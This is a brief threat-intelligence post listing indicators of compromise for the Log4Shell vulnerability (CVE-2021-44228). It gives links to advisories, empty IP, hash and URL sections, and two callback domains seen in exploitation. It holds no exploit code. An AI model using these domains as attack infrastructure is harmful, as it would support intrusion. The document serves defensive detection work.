Log4Shell (LOG4J) – CVE-2021-44228 related IOCs

Miguel Jiménez
Dec 11, 2021


Related info

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
https://www.ccn-cert.cni.es/seguridad-al-dia/alertas-ccn-cert/11435-ccn-cert-al-09-21-vulnerabilidad-en-apache-log4j-2.html

IPs

Hashes

URLs

Callback Domains

http443useragent.kryptoslogic-cve-2021-44228.com
bingsearchlib.com

More info: https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8
